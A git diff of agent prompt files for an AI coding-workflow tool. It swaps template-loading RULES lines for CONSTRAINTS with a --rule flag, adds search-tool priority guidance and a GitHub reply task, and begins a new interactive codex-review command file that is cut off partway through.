1. Execute implementation code (analysis only)
|
||||
2. Return without writing synthesis.json
|
||||
3. Skip cross-verification phase
|
||||
4. Generate more than 4 clarification questions
|
||||
5. Ignore previous round context
|
||||
6. Assume solution without multi-CLI validation
|
||||
@@ -65,6 +65,8 @@ Score = 0
|
||||
|
||||
## Phase 2: Context Discovery
|
||||
|
||||
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
|
||||
**1. Project Structure**:
|
||||
```bash
|
||||
ccw tool exec get_modules_by_depth '{}'
|
||||
@@ -112,9 +114,10 @@ plan → planning/architecture-planning.txt | planning/task-breakdown.txt
|
||||
bug-fix → development/bug-diagnosis.txt
|
||||
```
|
||||
|
||||
**3. RULES Field**:
|
||||
- Use `$(cat ~/.claude/workflows/cli-templates/prompts/{path}.txt)` directly
|
||||
- NEVER escape: `\$`, `\"`, `\'` breaks command substitution
|
||||
**3. CONSTRAINTS Field**:
|
||||
- Use `--rule <template>` option to auto-load protocol + template (appended to prompt)
|
||||
- Template names: `category-function` format (e.g., `analysis-code-patterns`, `development-feature`)
|
||||
- NEVER escape: `\"`, `\'` breaks shell parsing
|
||||
|
||||
**4. Structured Prompt**:
|
||||
```bash
|
||||
@@ -123,7 +126,7 @@ TASK: {specific_task_with_details}
|
||||
MODE: {analysis|write|auto}
|
||||
CONTEXT: {structured_file_references}
|
||||
EXPECTED: {clear_output_expectations}
|
||||
RULES: $(cat {selected_template}) | {constraints}
|
||||
CONSTRAINTS: {constraints}
|
||||
```
|
||||
|
||||
---
|
||||
@@ -154,8 +157,8 @@ TASK: {task}
|
||||
MODE: analysis
|
||||
CONTEXT: @**/*
|
||||
EXPECTED: {output}
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/analysis/pattern.txt)
|
||||
" --tool gemini --mode analysis --cd {dir}
|
||||
CONSTRAINTS: {constraints}
|
||||
" --tool gemini --mode analysis --rule analysis-code-patterns --cd {dir}
|
||||
|
||||
# Qwen fallback: Replace '--tool gemini' with '--tool qwen'
|
||||
```
|
||||
|
||||
@@ -165,7 +165,8 @@ Brief summary:
|
||||
## Key Reminders
|
||||
|
||||
**ALWAYS**:
|
||||
1. Read schema file FIRST before generating any output (if schema specified)
|
||||
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
2. Read schema file FIRST before generating any output (if schema specified)
|
||||
2. Copy field names EXACTLY from schema (case-sensitive)
|
||||
3. Verify root structure matches schema (array vs object)
|
||||
4. Match nested/flat structures as schema requires
|
||||
|
||||
@@ -106,7 +106,7 @@ EXPECTED:
|
||||
## Time Estimate
|
||||
**Total**: [time]
|
||||
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/planning/02-breakdown-task-steps.txt) |
|
||||
CONSTRAINTS:
|
||||
- Follow schema structure from {schema_path}
|
||||
- Acceptance/verification must be quantified
|
||||
- Dependencies use task IDs
|
||||
@@ -428,6 +428,7 @@ function validateTask(task) {
|
||||
## Key Reminders
|
||||
|
||||
**ALWAYS**:
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- **Read schema first** to determine output structure
|
||||
- Generate task IDs (T1/T2 for plan, FIX1/FIX2 for fix-plan)
|
||||
- Include depends_on (even if empty [])
|
||||
|
||||
@@ -127,14 +127,14 @@ EXPECTED: Structured fix strategy with:
|
||||
- Fix approach ensuring business logic correctness (not just test passage)
|
||||
- Expected outcome and verification steps
|
||||
- Impact assessment: Will this fix potentially mask other issues?
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/{template}) |
|
||||
CONSTRAINTS:
|
||||
- For {test_type} tests: {layer_specific_guidance}
|
||||
- Avoid 'surgical fixes' that mask underlying issues
|
||||
- Provide specific line numbers for modifications
|
||||
- Consider previous iteration failures
|
||||
- Validate fix doesn't introduce new vulnerabilities
|
||||
- analysis=READ-ONLY
|
||||
" --tool {cli_tool} --mode analysis --cd {project_root} --timeout {timeout_value}
|
||||
" --tool {cli_tool} --mode analysis --rule {template} --cd {project_root} --timeout {timeout_value}
|
||||
```
|
||||
|
||||
**Layer-Specific Guidance Injection**:
|
||||
@@ -436,6 +436,7 @@ See: `.process/iteration-{iteration}-cli-output.txt`
|
||||
## Key Reminders
|
||||
|
||||
**ALWAYS:**
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- **Validate context package**: Ensure all required fields present before CLI execution
|
||||
- **Handle CLI errors gracefully**: Use fallback chain (Gemini → Qwen → degraded mode)
|
||||
- **Parse CLI output structurally**: Extract specific sections (RCA, 修复建议, 验证建议)
|
||||
|
||||
@@ -385,10 +385,15 @@ Before completing any task, verify:
|
||||
- Make assumptions - verify with existing code
|
||||
- Create unnecessary complexity
|
||||
|
||||
**Bash Tool**:
|
||||
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
|
||||
**Bash Tool (CLI Execution in Agent)**:
|
||||
- Use `run_in_background=false` for all Bash/CLI calls - agent cannot receive task hook callbacks
|
||||
- Set timeout ≥60 minutes for CLI commands (hooks don't propagate to subagents):
|
||||
```javascript
|
||||
Bash(command="ccw cli -p '...' --tool codex --mode write", timeout=3600000) // 60 min
|
||||
```
|
||||
|
||||
**ALWAYS:**
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- Verify module/package existence with rg/grep/search before referencing
|
||||
- Write working code incrementally
|
||||
- Test your implementation thoroughly
|
||||
|
||||
@@ -27,6 +27,8 @@ You are a conceptual planning specialist focused on **dedicated single-role** st
|
||||
|
||||
## Core Responsibilities
|
||||
|
||||
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
|
||||
1. **Dedicated Role Execution**: Execute exactly one assigned planning role perspective - no multi-role assignments
|
||||
2. **Brainstorming Integration**: Integrate with auto brainstorm workflow for role-specific conceptual analysis
|
||||
3. **Template-Driven Analysis**: Use planning role templates loaded via `$(cat template)`
|
||||
@@ -306,3 +308,14 @@ When analysis is complete, ensure:
|
||||
- **Relevance**: Directly addresses user's specified requirements
|
||||
- **Actionability**: Provides concrete next steps and recommendations
|
||||
|
||||
## Output Size Limits
|
||||
|
||||
**Per-role limits** (prevent context overflow):
|
||||
- `analysis.md`: < 3000 words
|
||||
- `analysis-*.md`: < 2000 words each (max 5 sub-documents)
|
||||
- Total: < 15000 words per role
|
||||
|
||||
**Strategies**: Be concise, use bullet points, reference don't repeat, prioritize top 3-5 items, defer details
|
||||
|
||||
**If exceeded**: Split essential vs nice-to-have, move extras to `analysis-appendix.md` (counts toward limit), use executive summary style
|
||||
|
||||
|
||||
@@ -565,6 +565,7 @@ Output: .workflow/session/{session}/.process/context-package.json
|
||||
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
|
||||
|
||||
**ALWAYS**:
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- Initialize CodexLens in Phase 0
|
||||
- Execute get_modules_by_depth.sh
|
||||
- Load CLAUDE.md/README.md (unless in memory)
|
||||
|
||||
@@ -10,6 +10,8 @@ You are an intelligent debugging specialist that autonomously diagnoses bugs thr
|
||||
|
||||
## Tool Selection Hierarchy
|
||||
|
||||
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
|
||||
1. **Gemini (Primary)** - Log analysis, hypothesis validation, root cause reasoning
|
||||
2. **Qwen (Fallback)** - Same capabilities as Gemini, use when unavailable
|
||||
3. **Codex (Alternative)** - Fix implementation, code modification
|
||||
@@ -103,7 +105,7 @@ TASK: • Analyze error pattern • Identify potential root causes • Suggest t
|
||||
MODE: analysis
|
||||
CONTEXT: @{affected_files}
|
||||
EXPECTED: Structured hypothesis list with priority ranking
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/analysis/01-diagnose-bug-root-cause.txt) | Focus on testable conditions
|
||||
CONSTRAINTS: Focus on testable conditions
|
||||
" --tool gemini --mode analysis --cd {project_root}
|
||||
```
|
||||
|
||||
@@ -211,7 +213,7 @@ EXPECTED:
|
||||
- Evidence summary
|
||||
- Root cause identification (if confirmed)
|
||||
- Next steps (if inconclusive)
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/analysis/01-diagnose-bug-root-cause.txt) | Evidence-based reasoning only
|
||||
CONSTRAINTS: Evidence-based reasoning only
|
||||
" --tool gemini --mode analysis
|
||||
```
|
||||
|
||||
@@ -269,7 +271,7 @@ TASK:
|
||||
MODE: write
|
||||
CONTEXT: @{affected_files}
|
||||
EXPECTED: Working fix that addresses root cause
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/development/02-implement-feature.txt) | Minimal changes only
|
||||
CONSTRAINTS: Minimal changes only
|
||||
" --tool codex --mode write --cd {project_root}
|
||||
```
|
||||
|
||||
|
||||
@@ -70,8 +70,8 @@ The agent supports **two execution modes** based on task JSON's `meta.cli_execut
|
||||
CONTEXT: @**/* ./src/modules/auth|code|code:5|dirs:2
|
||||
./src/modules/api|code|code:3|dirs:0
|
||||
EXPECTED: Documentation files in .workflow/docs/my_project/src/modules/
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/documentation/module-documentation.txt) | Mirror source structure
|
||||
" --tool gemini --mode write --cd src/modules
|
||||
CONSTRAINTS: Mirror source structure
|
||||
" --tool gemini --mode write --rule documentation-module --cd src/modules
|
||||
```
|
||||
|
||||
4. **CLI Execution** (Gemini CLI):
|
||||
@@ -216,7 +216,7 @@ Before completion, verify:
|
||||
{
|
||||
"step": "analyze_module_structure",
|
||||
"action": "Deep analysis of module structure and API",
|
||||
"command": "ccw cli -p \"PURPOSE: Document module comprehensively\nTASK: Extract module purpose, architecture, public API, dependencies\nMODE: analysis\nCONTEXT: @**/* System: [system_context]\nEXPECTED: Complete module analysis for documentation\nRULES: $(cat ~/.claude/workflows/cli-templates/prompts/documentation/module-documentation.txt)\" --tool gemini --mode analysis --cd src/auth",
|
||||
"command": "ccw cli -p \"PURPOSE: Document module comprehensively\nTASK: Extract module purpose, architecture, public API, dependencies\nMODE: analysis\nCONTEXT: @**/* System: [system_context]\nEXPECTED: Complete module analysis for documentation\nCONSTRAINTS: Mirror source structure\" --tool gemini --mode analysis --rule documentation-module --cd src/auth",
|
||||
"output_to": "module_analysis",
|
||||
"on_error": "fail"
|
||||
}
|
||||
@@ -311,6 +311,7 @@ Before completing the task, you must verify the following:
|
||||
## Key Reminders
|
||||
|
||||
**ALWAYS**:
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- **Detect Mode**: Check `meta.cli_execute` to determine execution mode (Agent or CLI).
|
||||
- **Follow `flow_control`**: Execute the `pre_analysis` steps exactly as defined in the task JSON.
|
||||
- **Execute Commands Directly**: All commands are tool-specific and ready to run.
|
||||
|
||||
@@ -16,7 +16,7 @@ color: green
|
||||
- 5-phase task lifecycle (analyze → implement → test → optimize → commit)
|
||||
- Conflict-aware planning (isolate file modifications across issues)
|
||||
- Dependency DAG validation
|
||||
- Auto-bind for single solution, return for selection on multiple
|
||||
- Execute bind command for single solution, return for selection on multiple
|
||||
|
||||
**Key Principle**: Generate tasks conforming to schema with quantified acceptance criteria.
|
||||
|
||||
@@ -111,34 +111,34 @@ Generate multiple candidate solutions when:
|
||||
- Multiple valid implementation approaches exist
|
||||
- Trade-offs between approaches (performance vs simplicity, etc.)
|
||||
|
||||
| Condition | Solutions |
|
||||
|-----------|-----------|
|
||||
| Low complexity, single approach | 1 solution, auto-bind |
|
||||
| Medium complexity, clear path | 1-2 solutions |
|
||||
| High complexity, multiple approaches | 2-3 solutions, user selection |
|
||||
| Condition | Solutions | Binding Action |
|
||||
|-----------|-----------|----------------|
|
||||
| Low complexity, single approach | 1 solution | Execute bind |
|
||||
| Medium complexity, clear path | 1-2 solutions | Execute bind if 1, return if 2+ |
|
||||
| High complexity, multiple approaches | 2-3 solutions | Return for selection |
|
||||
|
||||
**Binding Decision** (based SOLELY on final `solutions.length`):
|
||||
```javascript
|
||||
// After generating all solutions
|
||||
if (solutions.length === 1) {
|
||||
exec(`ccw issue bind ${issueId} ${solutions[0].id}`); // MUST execute
|
||||
} else {
|
||||
return { pending_selection: solutions }; // Return for user choice
|
||||
}
|
||||
```
|
||||
|
||||
**Solution Evaluation** (for each candidate):
|
||||
```javascript
|
||||
{
|
||||
analysis: {
|
||||
risk: "low|medium|high", // Implementation risk
|
||||
impact: "low|medium|high", // Scope of changes
|
||||
complexity: "low|medium|high" // Technical complexity
|
||||
},
|
||||
score: 0.0-1.0 // Overall quality score (higher = recommended)
|
||||
analysis: { risk: "low|medium|high", impact: "low|medium|high", complexity: "low|medium|high" },
|
||||
score: 0.0-1.0 // Higher = recommended
|
||||
}
|
||||
```
|
||||
|
||||
**Selection Flow**:
|
||||
1. Generate all candidate solutions
|
||||
2. Evaluate and score each
|
||||
3. Single solution → auto-bind
|
||||
4. Multiple solutions → return `pending_selection` for user choice
|
||||
|
||||
**Task Decomposition** following schema:
|
||||
```javascript
|
||||
function decomposeTasks(issue, exploration) {
|
||||
return groups.map(group => ({
|
||||
const tasks = groups.map(group => ({
|
||||
id: `T${taskId++}`, // Pattern: ^T[0-9]+$
|
||||
title: group.title,
|
||||
scope: inferScope(group), // Module path
|
||||
@@ -161,7 +161,35 @@ function decomposeTasks(issue, exploration) {
|
||||
},
|
||||
depends_on: inferDependencies(group, tasks),
|
||||
priority: calculatePriority(group) // 1-5 (1=highest)
|
||||
}))
|
||||
}));
|
||||
|
||||
// GitHub Reply Task: Add final task if issue has github_url
|
||||
if (issue.github_url || issue.github_number) {
|
||||
const lastTaskId = tasks[tasks.length - 1]?.id;
|
||||
tasks.push({
|
||||
id: `T${taskId++}`,
|
||||
title: 'Reply to GitHub Issue',
|
||||
scope: 'github',
|
||||
action: 'Notify',
|
||||
description: `Comment on GitHub issue to report completion status`,
|
||||
modification_points: [],
|
||||
implementation: [
|
||||
`Generate completion summary (tasks completed, files changed)`,
|
||||
`Post comment via: gh issue comment ${issue.github_number || extractNumber(issue.github_url)} --body "..."`,
|
||||
`Include: solution approach, key changes, verification results`
|
||||
],
|
||||
test: { unit: [], commands: [] },
|
||||
acceptance: {
|
||||
criteria: ['GitHub comment posted successfully', 'Comment includes completion summary'],
|
||||
verification: ['Check GitHub issue for new comment']
|
||||
},
|
||||
commit: null, // No commit for notification task
|
||||
depends_on: lastTaskId ? [lastTaskId] : [], // Depends on last implementation task
|
||||
priority: 5 // Lowest priority (run last)
|
||||
});
|
||||
}
|
||||
|
||||
return tasks;
|
||||
}
|
||||
```
|
||||
|
||||
@@ -184,14 +212,14 @@ Write solution JSON to JSONL file (one line per solution):
|
||||
|
||||
**File Format** (JSONL - each line is a complete solution):
|
||||
```
|
||||
{"id":"SOL-GH-123-1","description":"...","approach":"...","analysis":{...},"score":0.85,"tasks":[...]}
|
||||
{"id":"SOL-GH-123-2","description":"...","approach":"...","analysis":{...},"score":0.75,"tasks":[...]}
|
||||
{"id":"SOL-GH-123-a7x9","description":"...","approach":"...","analysis":{...},"score":0.85,"tasks":[...]}
|
||||
{"id":"SOL-GH-123-b2k4","description":"...","approach":"...","analysis":{...},"score":0.75,"tasks":[...]}
|
||||
```
|
||||
|
||||
**Solution Schema** (must match CLI `Solution` interface):
|
||||
```typescript
|
||||
{
|
||||
id: string; // Format: SOL-{issue-id}-{N}
|
||||
id: string; // Format: SOL-{issue-id}-{uid}
|
||||
description?: string;
|
||||
approach?: string;
|
||||
tasks: SolutionTask[];
|
||||
@@ -204,9 +232,14 @@ Write solution JSON to JSONL file (one line per solution):
|
||||
**Write Operation**:
|
||||
```javascript
|
||||
// Append solution to JSONL file (one line per solution)
|
||||
const solutionId = `SOL-${issueId}-${seq}`;
|
||||
// Use 4-char random uid to avoid collisions across multiple plan runs
|
||||
const uid = Math.random().toString(36).slice(2, 6); // e.g., "a7x9"
|
||||
const solutionId = `SOL-${issueId}-${uid}`;
|
||||
const solutionLine = JSON.stringify({ id: solutionId, ...solution });
|
||||
|
||||
// Bash equivalent for uid generation:
|
||||
// uid=$(cat /dev/urandom | tr -dc 'a-z0-9' | head -c 4)
|
||||
|
||||
// Read existing, append new line, write back
|
||||
const filePath = `.workflow/issues/solutions/${issueId}.jsonl`;
|
||||
const existing = existsSync(filePath) ? readFileSync(filePath) : '';
|
||||
@@ -215,8 +248,8 @@ Write({ file_path: filePath, content: newContent })
|
||||
```
|
||||
|
||||
**Step 2: Bind decision**
|
||||
- **Single solution** → Auto-bind: `ccw issue bind <issue-id> <solution-id>`
|
||||
- **Multiple solutions** → Return for user selection (no bind)
|
||||
- 1 solution → Execute `ccw issue bind <issue-id> <solution-id>`
|
||||
- 2+ solutions → Return `pending_selection` (no bind)
|
||||
|
||||
---
|
||||
|
||||
@@ -231,14 +264,7 @@ Write({ file_path: filePath, content: newContent })
|
||||
|
||||
Each line is a solution JSON containing tasks. Schema: `cat .claude/workflows/cli-templates/schemas/solution-schema.json`
|
||||
|
||||
### 2.2 Binding
|
||||
|
||||
| Scenario | Action |
|
||||
|----------|--------|
|
||||
| Single solution | `ccw issue bind <issue-id> <solution-id>` (auto) |
|
||||
| Multiple solutions | Register only, return for selection |
|
||||
|
||||
### 2.3 Return Summary
|
||||
### 2.2 Return Summary
|
||||
|
||||
```json
|
||||
{
|
||||
@@ -275,7 +301,8 @@ Each line is a solution JSON containing tasks. Schema: `cat .claude/workflows/cl
|
||||
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
|
||||
|
||||
**ALWAYS**:
|
||||
1. Read schema first: `cat .claude/workflows/cli-templates/schemas/solution-schema.json`
|
||||
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
2. Read schema first: `cat .claude/workflows/cli-templates/schemas/solution-schema.json`
|
||||
2. Use ACE semantic search as PRIMARY exploration tool
|
||||
3. Fetch issue details via `ccw issue status <id> --json`
|
||||
4. Quantify acceptance.criteria with testable conditions
|
||||
@@ -283,7 +310,8 @@ Each line is a solution JSON containing tasks. Schema: `cat .claude/workflows/cl
|
||||
6. Evaluate each solution with `analysis` and `score`
|
||||
7. Write solutions to `.workflow/issues/solutions/{issue-id}.jsonl` (append mode)
|
||||
8. For HIGH complexity: generate 2-3 candidate solutions
|
||||
9. **Solution ID format**: `SOL-{issue-id}-{N}` (e.g., `SOL-GH-123-1`, `SOL-GH-123-2`)
|
||||
9. **Solution ID format**: `SOL-{issue-id}-{uid}` where uid is 4 random alphanumeric chars (e.g., `SOL-GH-123-a7x9`)
|
||||
10. **GitHub Reply Task**: If issue has `github_url` or `github_number`, add final task to comment on GitHub issue with completion summary
|
||||
|
||||
**CONFLICT AVOIDANCE** (for batch processing of similar issues):
|
||||
1. **File isolation**: Each issue's solution should target distinct files when possible
|
||||
@@ -297,9 +325,9 @@ Each line is a solution JSON containing tasks. Schema: `cat .claude/workflows/cl
|
||||
2. Use vague criteria ("works correctly", "good performance")
|
||||
3. Create circular dependencies
|
||||
4. Generate more than 10 tasks per issue
|
||||
5. **Bind when multiple solutions exist** - MUST check `solutions.length === 1` before calling `ccw issue bind`
|
||||
5. Skip bind when `solutions.length === 1` (MUST execute bind command)
|
||||
|
||||
**OUTPUT**:
|
||||
1. Write solutions to `.workflow/issues/solutions/{issue-id}.jsonl` (JSONL format)
|
||||
2. Single solution → `ccw issue bind <issue-id> <solution-id>`; Multiple → return only
|
||||
3. Return JSON with `bound`, `pending_selection`
|
||||
1. Write solutions to `.workflow/issues/solutions/{issue-id}.jsonl`
|
||||
2. Execute bind or return `pending_selection` based on solution count
|
||||
3. Return JSON: `{ bound: [...], pending_selection: [...] }`
|
||||
|
||||
@@ -87,7 +87,7 @@ TASK: • Detect file conflicts (same file modified by multiple solutions)
|
||||
MODE: analysis
|
||||
CONTEXT: @.workflow/issues/solutions/**/*.jsonl | Solution data: \${SOLUTIONS_JSON}
|
||||
EXPECTED: JSON array of conflicts with type, severity, solutions, recommended_order
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Severity: high (API/data) > medium (file/dependency) > low (architecture)
|
||||
CONSTRAINTS: Severity: high (API/data) > medium (file/dependency) > low (architecture)
|
||||
" --tool gemini --mode analysis --cd .workflow/issues
|
||||
```
|
||||
|
||||
@@ -275,7 +275,8 @@ Return brief summaries; full conflict details in separate files:
|
||||
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
|
||||
|
||||
**ALWAYS**:
|
||||
1. Build dependency graph before ordering
|
||||
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
2. Build dependency graph before ordering
|
||||
2. Detect file overlaps between solutions
|
||||
3. Apply resolution rules consistently
|
||||
4. Calculate semantic priority for all solutions
|
||||
|
||||
@@ -75,6 +75,8 @@ Examples:
|
||||
|
||||
## Execution Rules
|
||||
|
||||
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
|
||||
1. **Task Tracking**: Create TodoWrite entry for each depth before execution
|
||||
2. **Parallelism**: Max 4 jobs per depth, sequential across depths
|
||||
3. **Strategy Assignment**: Assign strategy based on depth:
|
||||
|
||||
@@ -28,6 +28,8 @@ You are a test context discovery specialist focused on gathering test coverage i
|
||||
|
||||
## Tool Arsenal
|
||||
|
||||
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
|
||||
### 1. Session & Implementation Context
|
||||
**Tools**:
|
||||
- `Read()` - Load session metadata and implementation summaries
|
||||
|
||||
@@ -332,6 +332,7 @@ When generating test results for orchestrator (saved to `.process/test-results.j
|
||||
## Important Reminders
|
||||
|
||||
**ALWAYS:**
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- **Execute tests first** - Understand what's failing before fixing
|
||||
- **Diagnose thoroughly** - Find root cause, not just symptoms
|
||||
- **Fix minimally** - Change only what's needed to pass tests
|
||||
|
||||
@@ -284,6 +284,8 @@ You execute 6 distinct task types organized into 3 patterns. Each task includes
|
||||
|
||||
### ALWAYS
|
||||
|
||||
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
|
||||
**W3C Format Compliance**: ✅ Include $schema in all token files | ✅ Use $type metadata for all tokens | ✅ Use $value wrapper for color (light/dark), duration, easing | ✅ Validate token structure against W3C spec
|
||||
|
||||
**Pattern Recognition**: ✅ Identify pattern from [TASK_TYPE_IDENTIFIER] first | ✅ Apply pattern-specific execution rules | ✅ Follow autonomy level
|
||||
|
||||
@@ -124,6 +124,7 @@ Before completing any task, verify:
|
||||
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
|
||||
|
||||
**ALWAYS:**
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- Verify resource/dependency existence before referencing
|
||||
- Execute tasks systematically and incrementally
|
||||
- Test and validate work thoroughly
|
||||
|
||||
361
.claude/commands/cli/codex-review.md
Normal file
361
.claude/commands/cli/codex-review.md
Normal file
@@ -0,0 +1,361 @@
|
||||
---
|
||||
name: codex-review
|
||||
description: Interactive code review using Codex CLI via ccw endpoint with configurable review target, model, and custom instructions
|
||||
argument-hint: "[--uncommitted|--base <branch>|--commit <sha>] [--model <model>] [--title <title>] [prompt]"
|
||||
allowed-tools: Bash(*), AskUserQuestion(*), Read(*)
|
||||
---
|
||||
|
||||
# Codex Review Command (/cli:codex-review)
|
||||
|
||||
## Overview
|
||||
Interactive code review command that invokes `codex review` via ccw cli endpoint with guided parameter selection.
|
||||
|
||||
**Codex Review Parameters** (from `codex review --help`):
|
||||
| Parameter | Description |
|
||||
|-----------|-------------|
|
||||
| `[PROMPT]` | Custom review instructions (positional) |
|
||||
| `-c model=<model>` | Override model via config |
|
||||
| `--uncommitted` | Review staged, unstaged, and untracked changes |
|
||||
| `--base <BRANCH>` | Review changes against base branch |
|
||||
| `--commit <SHA>` | Review changes introduced by a commit |
|
||||
| `--title <TITLE>` | Optional commit title for review summary |
|
||||
|
||||
## Prompt Template Format
|
||||
|
||||
Follow the standard ccw cli prompt template:
|
||||
|
||||
```
|
||||
PURPOSE: [what] + [why] + [success criteria] + [constraints/scope]
|
||||
TASK: • [step 1] • [step 2] • [step 3]
|
||||
MODE: review
|
||||
CONTEXT: [review target description] | Memory: [relevant context]
|
||||
EXPECTED: [deliverable format] + [quality criteria]
|
||||
CONSTRAINTS: [focus constraints]
|
||||
```
|
||||
|
||||
## EXECUTION INSTRUCTIONS - START HERE
|
||||
|
||||
**When this command is triggered, follow these exact steps:**
|
||||
|
||||
### Step 1: Parse Arguments
|
||||
|
||||
Check if user provided arguments directly:
|
||||
- `--uncommitted` → Record target = uncommitted
|
||||
- `--base <branch>` → Record target = base, branch name
|
||||
- `--commit <sha>` → Record target = commit, sha value
|
||||
- `--model <model>` → Record model selection
|
||||
- `--title <title>` → Record title
|
||||
- Remaining text → Use as custom focus/prompt
|
||||
|
||||
If no target specified → Continue to Step 2 for interactive selection.
|
||||
|
||||
### Step 2: Interactive Parameter Selection
|
||||
|
||||
**2.1 Review Target Selection**
|
||||
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "What do you want to review?",
|
||||
header: "Review Target",
|
||||
options: [
|
||||
{ label: "Uncommitted changes (Recommended)", description: "Review staged, unstaged, and untracked changes" },
|
||||
{ label: "Compare to branch", description: "Review changes against a base branch (e.g., main)" },
|
||||
{ label: "Specific commit", description: "Review changes introduced by a specific commit" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
**2.2 Branch/Commit Input (if needed)**
|
||||
|
||||
If "Compare to branch" selected:
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Which base branch to compare against?",
|
||||
header: "Base Branch",
|
||||
options: [
|
||||
{ label: "main", description: "Compare against main branch" },
|
||||
{ label: "master", description: "Compare against master branch" },
|
||||
{ label: "develop", description: "Compare against develop branch" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
If "Specific commit" selected:
|
||||
- Run `git log --oneline -10` to show recent commits
|
||||
- Ask user to provide commit SHA or select from list
|
||||
|
||||
**2.3 Model Selection (Optional)**
|
||||
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Which model to use for review?",
|
||||
header: "Model",
|
||||
options: [
|
||||
{ label: "Default", description: "Use codex default model (gpt-5.2)" },
|
||||
{ label: "o3", description: "OpenAI o3 reasoning model" },
|
||||
{ label: "gpt-4.1", description: "GPT-4.1 model" },
|
||||
{ label: "o4-mini", description: "OpenAI o4-mini (faster)" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
**2.4 Review Focus Selection**
|
||||
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "What should the review focus on?",
|
||||
header: "Focus Area",
|
||||
options: [
|
||||
{ label: "General review (Recommended)", description: "Comprehensive review: correctness, style, bugs, docs" },
|
||||
{ label: "Security focus", description: "Security vulnerabilities, input validation, auth issues" },
|
||||
{ label: "Performance focus", description: "Performance bottlenecks, complexity, resource usage" },
|
||||
{ label: "Code quality", description: "Readability, maintainability, SOLID principles" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
### Step 3: Build Prompt and Command
|
||||
|
||||
**3.1 Construct Prompt Based on Focus**
|
||||
|
||||
**General Review Prompt:**
|
||||
```
|
||||
PURPOSE: Comprehensive code review to identify issues, improve quality, and ensure best practices; success = actionable feedback with clear priorities
|
||||
TASK: • Review code correctness and logic errors • Check coding standards and consistency • Identify potential bugs and edge cases • Evaluate documentation completeness
|
||||
MODE: review
|
||||
CONTEXT: {target_description} | Memory: Project conventions from CLAUDE.md
|
||||
EXPECTED: Structured review report with: severity levels (Critical/High/Medium/Low), file:line references, specific improvement suggestions, priority ranking
|
||||
CONSTRAINTS: Focus on actionable feedback
|
||||
```
|
||||
|
||||
**Security Focus Prompt:**
|
||||
```
|
||||
PURPOSE: Security-focused code review to identify vulnerabilities and security risks; success = all security issues documented with remediation
|
||||
TASK: • Scan for injection vulnerabilities (SQL, XSS, command) • Check authentication and authorization logic • Evaluate input validation and sanitization • Identify sensitive data exposure risks
|
